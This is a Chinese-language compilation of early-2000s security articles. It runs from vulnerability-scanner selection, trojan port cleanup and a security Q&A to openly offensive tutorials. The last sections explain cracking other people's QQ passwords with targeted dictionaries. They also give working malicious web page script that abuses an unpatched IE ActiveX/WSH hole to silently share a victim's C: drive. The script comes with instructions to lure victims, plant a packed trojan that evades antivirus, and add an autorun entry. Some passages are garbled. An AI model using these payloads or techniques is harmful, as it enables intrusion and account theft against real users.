扫描古城可以分为"被动"和"主动"两大类。被动扫描不会產生网路流量包,不会導致目标系统崩溃,被动扫描工具对正常的网路流量进行分析,可以設計成"永远线上"檢測的方式。與主动扫描工具相比,被动扫描工具的工作方式,與网路監控器或IDS类似。
主动扫描工具更多地帶有"入侵"的意圖,可能会影響网路和目标系统的正常操作。他们并不是持續不断运行的,通常是隔一段时间檢測一次。
基于主机的扫描工具需要在每台主机上安装代理(Agent)软体;而基于网路的扫描工具则不需要。基于网路的扫描工具因为要佔用较多资源,一般需要一台專门的电脑。
如果网路環境中含有多种作業系统,您还需要看看扫描其是否相容这些不同的作業系统(比如Microsoft、Unix以及Netware等)。
2.2 管理员所关心的一些特性
通常,漏洞扫描工具完成一下功能:扫描、生成報告、分析并提出建议,以及资料管理。在许多方面,扫描是最常見的功能,但是资讯管理和扫描结果分析的準確性同样很重要。另外要考慮的一个方面是通知方式:当发现漏洞后,扫描工具是否会向管理员報警?采用什么方式報警?
对于漏洞扫描软体来说,管理员通常关係以下几个方面:
① 報表性能好;
② 易安装,易使用;
③ 能够檢測出缺少哪些補丁;
④ 扫描性能好,具備快速修复漏洞的能力;
⑤ 对漏洞及漏洞等级檢測的可*性;
⑥ 可擴展性;
⑦ 易升级性;
⑧ 性价比好;
2.3 漏洞庫
只有漏洞庫中存在相关资讯,扫描工具才能檢測到漏洞,因此,漏洞庫的数量决定了扫描工具能够檢測的範圍。
然而,数量并不意味者一切,真正的檢验标準在于扫描工具能否檢測出最常見的漏洞?最根本的在于,扫描工具能否檢測出影響您的系统的那些漏洞?扫描工具中有用的總量取决于你的网路設備和系统的类型。你使用扫描工具的目的是利用它来檢測您的特定環境中的漏洞。如果你有很多Netware伺服器,那么,不含Netware漏洞庫的扫描工具就不是你的最佳选择。
当然,漏洞庫中的攻击特性必须经常升级,这样才能檢測到最近发现的安全漏洞。
2.4 易使用性
一个难以理解和使用的介面,会阻礙管理员使用这些工具,因此,介面友好性尤为重要。不同的扫描工具软体,介面也各式各样,从簡單的基于文本的,到复杂的圖形介面,以及Web介面。
2.5 扫描報告
对管理员来说,扫描報告的功能越来越重要,在一个面向文檔的商務環境中,你不但要能够完成你的工作,而且还需要提供书面资料说明你是怎样完成的。事实上,一个扫描可能会得到几百甚至几千个结果,但是这些资料是没用的,除非经过整理,轉换成可以为人们理解的资讯。这就意味者理想情況下,扫描工具应该能够对这些资料进行分类和交*引用,可以導到其他程式中,或者轉换成其他格式(比如CSV,HTML,XML,MHT,MDB,EXCEL以及Lotus等等),采用不同方式来展现它,并且能够很容易的與以前的扫描结果做比较。
漏洞,才完成一半工作。一个完整的方案,同时将告訴你針对这些漏洞将采取哪些措施。一个好的漏洞扫描工具会对扫描结果进行分析,并提供修复建议。一些扫描工具将这些修复建议整合在報告中,另外一些则提供產品网站或其他线上资源的鏈结。
漏洞修复工具,它可以和流行的扫描工具结合在一起使用,对扫描结果进行匯總,并自动完成修复过程。
2.7 分析的準確性
只有当報告的结果是精確的,提供的修复建议是有效的,一份包含了詳細漏洞修复建议的報告, 才算是一份優秀的報告。一个好的扫描工具必须具有很低的误報率(報告出的漏洞实际上不存在)和漏報率(漏洞存在,但是没有檢測到)。
2.8 安全問題
因扫描工具而造成的网路癱瘓所引起的经濟損失,和真实攻击造成的損失是一样的,都非常巨大。一些扫描工具在发现漏洞后,会尝试进一步利用这些漏洞,这样能够確保这些漏洞是真实存在的,进而消除误報的可能性。但是,这种方式容易出现难以預料的情況。在使用具備这种功能的扫描工具的时候,需要格外小心,最好不要将其設置成自动运行狀態。
扫描工具可能造成网路失效的另一种原因,是扫描过程中,超負荷的资料包流量造成拒絕服務(DOS,Denial OfService)。为了防止这一点,需要选择好适当的扫描設置。相关的設置项有:併发的线程数、资料包间隔时间、扫描物件總数等,这些项应该能够調整,以便使网路的影響降到最低。一些扫描工具还提供了"安全扫描"的範本,以防止造成对目标系统的損耗。
2.9 性能
扫描工具运行的时候,将佔用大量的网路帶寬,因此,扫描过程应尽快完成。当然,漏洞庫中的漏洞数越多,选择的扫描模式越复杂,扫描所耗时间就越长,因此,这只是个相对的数值。提高性能的一种方式,是在企業网中部署多个扫描工具,将扫描结果回饋到一个系统中,对扫描结果进行匯總。
3、隱患扫描工具的价格策略
商業化的扫描工具通常按以下几种方式来发佈器授权许可证:按IP地址授权,按伺服器授权,按管理员授权。不同的授权许可证方式有所区别。
3.1 按IP段授权
许多扫描其產品,比如eEye的Retina和ISS(InternetSecurity Scanner)要求企業用户按照IP段或IP範圍来收費。换句話说,价格取决于所授权的可扫描的IP位址的数目。
3.2 按伺服器授权
一些扫描工具供应商,按照每个伺服器/每个工作站来計算器许可证的价格。伺服器的授权价格会比工作站高很多,如果有多台伺服器的話,扫描工具的价格会明顯上升。
3.3 按管理员授权
对于大多数企業而言,这种授权方式,比较簡單,性价比也较好。
4、總结
在现在的互联网環境中,威脅无处不在。为了防範攻击,第一件事就是在骇客发动攻击之前,发现网路和系统中的漏洞,并及时修复。
但是,漏洞扫描工具在特性、精確性、价格以及可用性上差别较大,如何选择一个正確的隱患扫描工具,尤为重要。
=====================================================
骇客及木马攻击常見埠的关閉
以下列出的埠僅为相关木马程式默认情況下开放的埠,请根據具体情況采取相应的操作:
707埠的关閉:
这个埠开放表示你可能感染了nachi蠕蟲病毒,该蠕蟲的清除方法如下:
1、停止服務名为WinS Client和NetworkConnections Sharing的两项服務
2、刪除c:WinntSYSTEM32WinS目录下的DLLHOST.EXE和SVCHOST.EXE文件
3、编輯註冊表,刪除HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices项中名为RpcTftpd和RpcPatch的两个鍵值
1999埠的关閉:
这个埠是木马程式BackDoor的默认服務埠,该木马清除方法如下:
1、使用进程管理工具将notpa.exe进程结束
2、刪除c:Windows目录下的notpa.exe程式
3、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run项中包含c:Windowsotpa.exe /o=yes的鍵值
2001埠的关閉:
这个埠是木马程式黑洞2001的默认服務埠,该木马清除方法如下:
1、首先使用进程管理软体将进程Windows.exe殺掉
2、刪除c:Winntsystem32目录下的Windows.exe和S_Server.exe文件
3、编輯註冊表,刪除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
RunServices项中名为Windows的鍵值
4、将HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINESoftwareCLASSES项中的Winvxd项刪除
5、修改HKEY_CLASSES_ROOTxtfileshellopencommand项中的
c:Winntsystem32S_SERVER.EXE%1为C:WinNTNOTEPAD.EXE %1
6、修改HKEY_LOCAL_MACHINESoftwareCLASSESxtfileshellopencommand
项中的c:Winntsystem32S_SERVER.EXE%1鍵值改为 C:WinNTNOTEPAD.EXE %1
2023埠的关閉:
这个埠是木马程式Ripper的默认服務埠,该木马清除方法如下:
1、使用进程管理工具结束sysrunt.exe进程
2、刪除c:Windows目录下的sysrunt.exe程式檔
3、编輯system.ini文件,将shell=explorer.exesysrunt.exe 改为shell=explorer.exe后保存
4、重新啟动系统
2583埠的关閉:
这个埠是木马程式Wincrash v2的默认服務埠,该木马清除方法如下:
1、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run项中的WinManager ="c:Windowsserver.exe"鍵值
2、编輯Win.ini文件,将run=c:Windowsserver.exe改为run=后保存退出
3、重新啟动系统后刪除C:WindowssystemSERVER.EXE
3389埠的关閉:
首先说明3389埠是Windows的远端管理终端所开的埠,它并不是一个木马程式,请先確定该服務是否是你自己开放的。如果不是必须的,请关閉该服務。
Win2000关閉的方法:
1、Win2000server 开始-->程式-->管理工具-->服務里找到TerminalServices服務项,选中屬性选项将啟动类型改成手动,并停止该服務。
2、Win2000pro开始-->設置-->控制面板-->管理工具-->服務里找到TerminalServices服務项,选中屬性选项将啟动类型改成手动,并停止该服務。
Winxp关閉的方法:
在我的电脑上点右鍵选屬性-->远端,将里面的远程协助和远端桌面两个选项框里的勾去掉。
4444埠的关閉:
如果发现你的机器开放这个埠,可能表示你感染了msblast蠕蟲,清除该蠕蟲的方法如下:
1、使用进程管理工具结束msblast.exe的进程
2、编輯註冊表,刪除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
项中的"Windowsauto update"="msblast.exe"鍵值
3、刪除c:Winntsystem32目录下的msblast.exe文件
4899埠的关閉:
首先说明4899埠是一个远端控制软体(remoteadministrator)服務端監听的埠,他不能算是一个木马程式,但是具有远端控制功能,通常殺毒软体是无法查出它来的,请先確定该服務是否是你自己开放并且是必需的。如果不是请关閉它。
关閉4899埠:
1、请在开始-->运行中輸入cmd(98以下为command),然后 cdC:Winntsystem32(你的系统安装目录),輸入r_server.exe /stop后按回車。
然后在輸入r_server/uninstall /silence
2、到C:Winntsystem32(系统目录)下刪除r_server.exeadmdll.dll
raddrv.dll三个文件
5800,5900埠:
首先说明5800,5900埠是远端控制软体VNC的默认服務埠,但是VNC在修改过后会被用在某些蠕蟲中。
请先確认VNC是否是你自己开放并且是必须的,如果不是请关閉
关閉的方法:
1、首先使用fport命令確定出監听在5800和5900埠的程式所在位置(通常会是c:Winntfont***plorer.exe)
2、在任務管理器中殺掉相关的进程(注意有一个是系统本身正常的,请注意!如果错殺可以重新运行c:Winntexplorer.exe)
3、刪除C:Winntfonts中的explorer.exe程式。
4、刪除註冊表HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionRun项中的Explorer鍵值。
5、重新啟动机器。
6129埠的关閉:
首先说明6129埠是一个远端控制软体(dameware ntutilities)服務端監听得埠,他不是一个木马程式,但是具有远端控制功能,通常的殺毒软体是无法查出它来的。请先確定该服務是否是你自己安装并且是必需的,如果不是请关閉
关閉6129埠:
1、选择开始-->設置-->控制面板-->管理工具-->服務
找到DameWare MiniRemote Control项点击右鍵选择屬性选项,将啟动类型改成禁用后停止该服務。
2、到c:Winntsystem32(系统目录)下将DWRCS.EXE程式刪除。
3、到註冊表内将HKEY_LOCAL_MACHINESYSTEMControlSet001Services项中的DWRCS鍵值刪除
6267埠的关閉:
6267埠是木马程式廣外女生的默认服務埠,该木马刪除方法如下:
1、啟动到安全模式下,刪除c:Winntsystem32下的DIAGFG.EXE文件
2、到c:Winnt目录下找到regedit.exe文件,将该文件的尾码名改为.com
3、选择开始-->运行輸入regedit.com进入註冊表编輯页面
4、修改HKEY_CLASSES_ROOTexefileshellopencommand项的鍵值为
"%1" %*
5、刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices项中名字为Diagnostic Configuration的鍵值
6、将c:Winnt下的regedit.com改回到regedit.exe
6670、6771埠的关閉:
这些埠是木马程式DeepThroat v1.0- 3.1默认的服務埠,清除该木马的方法如下:
1、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersion
Run项中的‘System32‘=c:Windowssystem32.exe鍵值(版本1.0)或‘SystemTray‘ = ‘Systray.exe‘ 鍵值(版本2.0-3.0)鍵值
3、重新啟动机器后刪除c:Windowssystem32.exe(版本1.0)或c:Windowssystemsystray.exe(版本2.0-3.0)
6939 埠的关閉:
这个埠是木马程式Indoctrination默认的服務埠,清除该木马的方法如下:
1、编輯註冊表,刪除
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRun
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRunServices
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRunOnce
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRunServicesOnce
四项中所有包含Msgsrv16="msgserv16.exe"的鍵值
2、重新啟动机器后刪除C:Windowssystem目录下的msgserv16.exe文件
6969埠的关閉:
这个埠是木马程式PRIORITY的默认服務埠,清除该木马的方法如下:
1、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run Services项中的"PServer"=C:WindowsSystemPServer.exe鍵值
2、重新啟动系统后刪除C:WindowsSystem目录下的PServer.exe文件
7306埠的关閉:
这个埠是木马程式网路精靈的默认服務埠,该木马刪除方法如下:
1、你可以使用fport察看7306埠由哪个程式監听,记下程式名稱和所在的路徑
2、如果程式名为Netspy.exe,你可以在命令行方式下到该程式所在目录輸入命令Netspy.exe/remove来刪除木马
3、如果是其他名字的程式,请先在进程中结束该程式的进程,然后到相应目录下刪除该程式。
4、编輯註冊表,将HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun项和HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices项中與该程式有关的鍵值刪除
7511埠的关閉:
7511是木马程式聰明基因的默认連接埠,该木马刪除方法如下:
1、首先使用进程管理工具殺掉MBBManager.exe这个进程
2、刪除c:Winnt(系统安装目录)中的MBBManager.exe和Explore32.exe程式檔,刪除c:Winntsystem32目录下的editor.exe文件
3、编輯註冊表,刪除註冊表HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run项中内容为C:WinNTMBBManager.exe鍵名为MainBroadBackManager的项。
4、修改註冊表HKEY_CLASSES_ROOTxtfileshellopencommand中的c:Winntsystem32editor.exe%1改为c:WinntNOTEPAD.EXE %1
5、修改註冊表HKEY_LOCAL_MACHINESoftwareCLASSEShlpfileshellopencommand
项中的C:WinNTexplore32.exe%1鍵值改为C:WinNTWinHLP32.EXE %1
7626埠的关閉:
7626是木马冰河的默认开放埠(这个埠可以改变),木马刪除方法如下:
1、啟动机器到安全模式下,编輯註冊表,刪除HKEY_LOCAL_MACHINEsoftwaremicrosoftWindowsCurrentVersionRun
项中内容为c:Winntsystem32Kernel32.exe的鍵值
2、刪除HKEY_LOCAL_MACHINEsoftwaremicrosoftWindowsCurrentVersionRunservices项中内容为C:Windowssystem32Kernel32.exe的鍵值
3、修改HKEY_CLASSES_ROOTxtfileshellopencommand项下的C:Winntsystem32Sy***plr.exe%1为C:Winnt otepad.exe %1
4、到C:Windowssystem32下刪除檔Kernel32.exe和Sy***plr.exe
8011埠的关閉:
8011埠是木马程式WAY2.4的默认服務埠,该木马刪除方法如下:
1、首先使用进程管理工具殺掉msgsvc.exe的进程
2、到C:Windowssystem目录下刪除msgsvc.exe文件
3、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run项中内容为C:WinDOWSSYSTEMmsgsvc.exe的鍵值
【 全部完 】
骇客新手基础知识16問答
問:什么是网路安全?
答:网路安全是指网路系统的硬体、软体及其系统中的资料受到保护,不因偶然的或者惡意的原因而遭到破坏、更改、洩露,系统可以連續可*正常地运行,网路服務不被中断。
問:什么是电脑病毒?
答:电脑病毒(Computer Virus)是指编制者在电脑程式中插入的破坏电脑功能或者破坏资料,影響电脑使用并且能够自我复制的一組电脑指令或者程式码。
問:什么是木马?
答:木马是一种帶有惡意性質的远端控制软体。木马一般分为用户端(client)和伺服器端(server)。用户端就是本地使用的各种命令的控制台,伺服器端则是要给别人运行,只有运行过伺服器端的电脑才能够完全受控。木马不会像病毒那样去感染檔。
問:什么是防火墙?它是如何確保网路安全的?
答:使用防火墙(Firewall)是一种確保网路安全的方法。防火墙是指設置在不同网路(如可信任的企業内部网和不可信的公共网)或网路安全域之间的一系列部件的組合。它是不同网路或网路安全域之间资讯的惟一出入口,能根據企業的安全政策控制(允许、拒絕、監測)出入网路的资讯流,且本身具有较強的抗攻击能力。它是提供资讯安全服務,实现网路和资讯安全的基础設施。
問:什么是后门?为什么会存在后门?
答:后门(Back Door)是指一种繞过安全性控制而获取对程式或系统访問权的方āT諶砑目⒔錐危絛蛟背;嵩諶砑詿唇ê竺乓员憧梢孕薷某絛蛑械娜毕蕁H綣竺瘧黃淥酥溃蚴竊詵⒉既砑懊揮猩境敲此统閃稅踩肌?
問:什么叫入侵檢測?
答:入侵檢測是防火墙的合理補充,帮助系统对付网路攻击,擴展系统管理员的安全管理能力(包括安全審計、監視、进攻识别和回应),提高资讯安全基础结構的完整性。它从电脑网路系统中的若干关鍵点收集资讯,并分析这些资讯,檢查网路中是否有违反安全策略的行为和遭到襲击的迹象
問:什么叫资料包監測?它有什么作用?
答:资料包監測可以被认为是一根竊听电話线在电脑网路中的等价物。当某人在“監听”网路时,他们实际上是在阅读和解释网路上传送的资料包。如果你需要在互联网上通过电脑发送一封电子郵件或请求下載一个网页,这些操作都会使资料通过你和资料目的地之间的许多电脑。这些传輸资讯时经过的电脑都能够看到你发送的资料,而资料包監測工具就允许某人截获资料并且查看它。
問:什么是NIDS?
答:NIDS是NetworkIntrusion Detection System的縮写,即网路入侵檢測系统,主要用于檢測Hacker或Cracker通过网路进行的入侵行为。NIDS的运行方式有两种,一种是在目标主机上运行以監測其本身的通信资讯,另一种是在一台單独的机器上运行以監測所有网路設備的通信资讯,比如Hub、路由器。
問:什么叫SYN包?
答:TCP連接的第一个包,非常小的一种资料包。SYN攻击包括大量此类的包,由于这些包看上去来自实际不存在的站点,因此无法有效进行处理。
問:加密技术是指什么?
答:加密技术是最常用的安全保密手段,利用技术手段把重要的资料变为乱码(加密)传送,到达目的地后再用相同或不同的手段还原(解密)。
加密技术包括两个元素:演算法和密鑰。演算法是将普通的资讯或者可以理解的资讯與一串数位(密鑰)结合,產生不可理解的密文的步驟,密鑰是用来对资料进行编码和解密的一种演算法。在安全保密中,可通过适当的鑰加密技术和管理机制来保证网路的资讯通信安全。
問:什么叫蠕蟲病毒?
答:蠕蟲病毒(Worm)源自第一种在网路上传播的病毒。1988年,22歲的康奈爾大学研究生羅伯特·莫里斯(Robert Morris)通过网路发送了一种專为攻击UNIX系统缺陷、名为“蠕蟲”(Worm)的病毒。蠕蟲造成了6000个系统癱瘓,估計損失为200萬到6000萬美元。由于这只蠕蟲的誕生,在网上还專门成立了电脑应急小組(CERT)。现在蠕蟲病毒家族已经壯大到成千上萬种,并且这千萬种蠕蟲病毒大都出自骇客之手。
問:什么是作業系统型病毒?它有什么危害?
答:这种病毒会用它自己的程式加入作業系统或者取代部分作業系统进行工作,具有很強的破坏力,会導致整个系统癱瘓。而且由于感染了作業系统,这种病毒在运行时,会用自己的程式片断取代作業系统的合法程式模組。根據病毒自身的特点和被替代的作業系统中合法程式模組在作業系统中运行的地位與作用,以及病毒取代作業系统的取代方式等,对作業系统进行破坏。同时,这种病毒对系统中檔的感染性也很強。
問:莫里斯蠕蟲是指什么?它有什么特点?
答:它的编写者是美国康乃爾大学一年级研究生羅特·莫里斯。这个程式只有99行,利用了Unix系统中的缺点,用Finger命令查联机用户名單,然后破譯用户口令,用Mail系统复制、传播本身的根源程式,再编譯生成代码。
最初的网路蠕蟲設計目的是当网路空閒时,程式就在电脑间“遊蕩”而不帶来任何損害。当有机器負荷过重时,该程式可以从空閒电脑“借取资源”而达到网路的負載平衡。而莫里斯蠕蟲不是“借取资源”,而是“耗盡所有资源”。
問:什么是DDoS?它会導致什么后果?
答:DDoS也就是分散式拒絕服務攻击。它使用與普通的拒絕服務攻击同样的方法,但是发起攻击的源是多个。通常攻击者使用下載的工具滲透无保护的主机,当获得该主机的适当的访問许可权后,攻击者在主机中安装软体的服務或进程(以下簡稱代理)。这些代理保持睡眠狀態,直到从它们的主控端得到指令,对指定的目标发起拒絕服務攻击。隨者危害力极強的骇客工具的廣泛传播使用,分散式拒絕服務攻击可以同时对一个目标发起几千个攻击。單个的拒絕服務攻击的威力也许对帶寬较寬的站点没有影響,而分佈于全球的几千个攻击将会產生致命的后果。
問:局域网内部的ARP攻击是指什么?
答:ARP协定的基本功能就是通过目标設備的IP位址,查詢目标設備的MAC位址,以保证通信的进行。
基于ARP协议的这一工作特性,骇客向对方电脑不断发送有欺詐性質的ARP资料包,资料包内包含有與当前設備重复的Mac位址,使对方在回应報文时,由于簡單的位址重复错误而導致不能进行正常的网路通信。一般情況下,受到ARP攻击的电脑会出现两种现象:
1.不断彈出“本机的XXX段硬体位址與网路中的XXX段位址衝突”的对話方塊。
2.电脑不能正常上网,出现网路中断的症狀。
因为这种攻击是利用ARP请求報文进行“欺騙”的,所以防火墙会误以为是正常的请求资料包,不予攔截。因此普通的防火墙很难抵擋这种攻击。
問:什么叫欺騙攻击?它有哪些攻击方式?
答:网路欺騙的技术主要有:HONEYPOT和分散式HONEYPOT、欺騙空间技术等。主要方式有:IP欺騙、ARP欺騙、DNS欺騙、Web欺騙、电子郵件欺騙、源路由欺騙(通过指定路由,以假冒身份與其他主机进行合法通信或发送假報文,使受攻击主机出现错误动作)、位址欺騙(包括伪造源位址和伪造中间站点)等。
========================================================
菜鸟骇客入门攻击及防範技巧
在正式进行各种“骇客行为”之前,骇客会采取各种手段,探測(也可以说“偵察”)对方的主机资讯,以便决定使用何种最有效的方法达到自己的目的。来看看骇客是如何获知最基本的网路资讯——对方的IP位址;以及用户如何防範自己的IP洩漏。
■ 获取IP
“IP”作为Net用户的重要标示,是骇客首先需要了解的。获取的方法较多,骇客也会因不同的网路情況采取不同的方法,如:在局域网内使用Ping指令,Ping对方在网路中的名稱而获得IP;在Internet上使用IP版的QQ直接顯示。而最“牛”,也是最有效的辦法是截获并分析对方的网路资料包。如圖1所示,这是用Windows 2003的网路監視器捕获的网路资料包,可能一般的用户比较难看懂这些16进制的代码,而对于了解网路知识的骇客,他们可以找到并直接通过软体解析截获后的资料包的IP包頭资讯,再根據这些资讯了解具体的IP。
■ 隱藏IP
雖然偵察IP的方法多样,但用户可以隱藏IP的方法同样多样。就拿对付最有效的“资料包分析方法”而言,就可以安装能够自动去掉发送资料包包頭IP资讯的“Norton InternetSecurity 2003”。不过使用“Norton Internet Security”有些缺点,譬如:它耗費资源嚴重,降低电脑性能;在访問一些论坛或者网站时会受影響;不适合网吧用户使用等等。现在的个人用户采用最普及隱藏IP的方法应该是使用代理,由于使用代理伺服器后,“轉址服務”会对发送出去的资料包有所修改,致使“资料包分析”的方法失效。一些容易洩漏用户IP的网路软体(QQ、MSN、IE等)都支援使用代理方式連接Internet,特别是QQ使用“ezProxy”等代理软体連接后,IP版的QQ都无法顯示该IP位址。这里筆者介绍一款比较适合个人用户的簡易代理软体——网路新手IP隱藏器(如圖2),只要在“代理伺服器”和“代理伺服器端”填入正確的代理伺服器位址和埠,即可对http使用代理,比较适合由于IE和QQ洩漏IP的情況。
不过使用代理伺服器,同样有一些缺点,如:会影響网路通讯的速度;需要网路上的一台能够提供代理能力的电脑,如果用户无法找到这样的代理伺服器就不能使用代理(查找代理伺服器时,可以使用“代理獵手”等工具软体扫描网路上的代理伺服器)。
雖然代理可以有效地隱藏用户IP,但高深的骇客亦可以繞过代理,查找到对方的真实IP位址,用户在何种情況下使用何种方法隱藏IP,也要因情況而论。
骇客的探測方式里除了偵察IP,还有一项——埠扫描。通过“埠扫描”可以知道被扫描的电脑哪些服務、埠是打开而没有被使用的(可以理解为寻找通往电脑的通道)。
一、埠扫描
网上很容易找到远端埠扫描的工具,如Superscan、IP Scanner、Fluxay(流光)等(如圖1),这就是用“流光”对试验主机192.168.1.8进行埠扫描后的结果。从中我们可以清楚地了解,该主机的哪些非常用埠是打开的;是否支援FTP、Web服務;且FTP服務是否支援“匿名”,以及IIS版本,是否有可以被成功攻破的IIS漏洞也顯示出来。
二、阻止埠扫描
防範埠扫描的方法有两个:
1. 关閉閒置和有潛在危險的埠
这个方法有些“死板”,它的本質是——将所有用户需要用到的正常电脑埠外的其他埠都关閉掉。因为就骇客而言,所有的埠都可能成为攻击的目标。换句話说“电脑的所有对外通讯的埠都存在潛在的危險”,而一些系统必要的通讯埠,如访問网页需要的HTTP(80埠);QQ(4000埠)等不能被关閉。
在Windows NT核心系统(Windows 2000/XP/2003)中要关閉掉一些閒置埠是比较方便的,可以采用“定向关閉指定服務的埠”和“只开放允许埠的方式”。电脑的一些网路服務会有系统分配默认的埠,将一些閒置的服務关閉掉,其对应的埠也会被关閉了(如圖2)。进入“控制面板”、“管理工具”、“服務”项内,关閉掉电脑的一些没有使用的服務(如FTP服務、DNS服務、IIS Admin服務等等),它们对应的埠也被停用了。至于“只开放允许埠的方式”,可以利用系统的“TCP/IP篩选”功能实现,設置的时候,“只允许”系统的一些基本网路通讯需要的埠即可(关于“TCP/IP的篩选”,请參看本期应用專題)。
2. 檢查各埠,有埠扫描的症狀时,立即遮罩该埠
这种預防埠扫描的方式顯然用户自己手工是不可能完成的,或者说完成起来相当困难,需要借助软体。这些软体就是我们常用的网路防火墙。
防火墙的工作原理是:首先檢查每个到达你的电脑的资料包,在这个包被你机上运行的任何软体看到之前,防火墙有完全的否决权,可以禁止你的电脑接收Internet上的任何東西。当第一个请求建立連接的包被你的电脑回应后,一个“TCP/IP埠”被打开;埠扫描时,对方电脑不断和本地电脑建立連接,并逐渐打开各个服務所对应的“TCP/IP埠”及閒置埠,防火墙经过自帶的攔截規则判断,就能够知道对方是否正进行埠扫描,并攔截掉对方发送过来的所有扫描需要的资料包。
现在市面上几乎所有网路防火墙都能够抵禦埠扫描,在默认安装后,应该檢查一些防火墙所攔截的埠扫描規则是否被选中,否则它会放行埠扫描,而只是在日誌中留下资讯而已。
骇客在进行攻击前的準備工作,就此介绍完毕。在以后的内容中,将轉入正式的入侵、竊取和攻击等具体的介绍。
上网了吧,用Q了吧,被盜了吧,正常。想上网吧,想用Q吧,不想被盜Q吧,正常。那就来了解一些盜QQ方面的知识吧!
一、名詞解释
1.字典
所谓字典,其实就是一个包含有许多密码的文字檔案。字典的生成有两种方式:用字典软体生成和手动添加。一般字典软体能生成包含生日、电話号码、常用英文名等密码的字典,不过由于这样生成的字典体积大,而且不靈活,所以骇客往往会手动添加一些密码到字典里去,形成一个“智慧化”的密码檔。
2.暴力破解
所谓暴力破解,其实就是用无数的密码来與登录QQ的密码进行核对,直到相同为止。暴力破解这种方法不僅可以运用在盜QQ上,在破解其他密码时也常用这种方法,如:破解系统管理员密码等。这是最常用的一种破解方式。
二、原理分析
现在盜QQ的软体有两种,本地破解和远端破解。看起来好像挺神秘的,其实说穿了就那么回事。下面咱们先来看看本地破解。
1.本地破解
本地破解其实就是用软体选择一个在本地登录过的QQ号码,然后掛上字典进行密码核对。本地破解也可分为两种:暴力破解和本地记录。而暴力破解又分为两种:按順序增加和通过字典对比。比如现在我要破解QQ号为123456的密码,我可以用1作为密码进行核对,如果正確就可以盜走该号了,如果不正確,则用2来核对,还不正確,则用3,以此順序增加,直到和密码相同为止。不过这样的破解效率是很低的,因为许多人的密码并不只是数位,所以这种方法并不常見。
平时常用的是通过对比字典中密码的方法,如果正確就盜走QQ。因为字典可以做得很“智慧化”,所以这种破解效率相对较高,特别是当你的密码是簡單的数位,或是数位加一些英文名时特别明顯。举个例子,比如我在网吧看到一MM的英文名为alice,密码位元数为8位元(我怎么知道的?暈!偷看到的嘛!)。从常理来講,一般她的密码就是alice加上一些数位。于是我可以用易優超级字典生成器制作这样一个字典:把alice做为特殊字元排在密码的第1-5位(如圖1),然后把基本字元里的数位全部选上,再将密码位元数設为8,然后选好保存位置点“生成字典”。
圖1
打开生成的字典,你就可以看到alice000、alice001等密码了(如圖2)。然后就是把alice放在第2-6位,第3-7位,第4-8位,其他位置同样用数位填满。接下来我只要用软体把这些字典掛上进行破解,很快就可以得到QQ密码了。
===============================================
骇客通过网页竊取QQ方法
要想偷别人的QQ,方法有很多了。利用惡意网页使对方的电脑被共用出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:
------------------------------------------------------------------------
<scriptlanguage=Java Script>
document.write("<APPLET HEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject()Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>
-------------------------------------
上面的代码大家一定很容易读懂,簡單说来就是通过修改对方註冊表中的鍵值,把对方的C盤共用出来,如果想让对方的其他盤都共用请自行設置。
述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表WindowsScripting Host(WSH)的外殼对象。WSH是微软提供的一种基于32位Windows平台的、與语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行,就象执行批次处理一样。以“Shl.RegWrite”开頭的这几句代码的作用是写入流览者的註冊表,就是它们使得对方的硬碟被共用的。把“Flags”的鍵值設为00000302可以隱藏共用,使对方无法发现,非常隱蔽。
网页做好后,把它上传你的主页空间,騙他流览你的网页(就看你的嘴皮子功夫了),如果对方的IE没有打補丁(网上这样的电脑有很多),就可以把他的C盤共用出来。整个方法的原理就是把com.ms.activeX.ActiveXComponent物件嵌入<APPLET>标记中,这样会導致任意創建和解释执行ActiveX物件,使我们可以創建任意檔、运行程式、写註冊表。未打補丁的IE,在打开含有上述代码的网页时不会有任何警告,我们就是利用这个漏洞把对方的硬碟被共用出来。
等对方中招后,就把对方的硬碟映射过来,可以使用net use命令,也可以使用网路刺客II等软体。下一步可以给对方植入一个盜QQ的软体,比方说QQ殺手等,注意一定要用ASPack或其他加殼软体给木马加殼(其实就是另类“壓縮”),防止殺毒软体发现。
最后,打开记事本鍵入以下内容:
[AutoRun]
open=winnt32.exe
